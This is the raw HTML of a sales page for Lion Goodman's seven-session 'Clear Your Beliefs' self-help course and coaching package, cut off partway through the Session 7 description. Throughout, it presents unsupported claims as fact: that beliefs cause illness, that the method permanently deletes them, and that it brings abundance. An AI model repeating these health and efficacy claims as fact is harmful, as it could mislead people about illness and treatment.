alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find 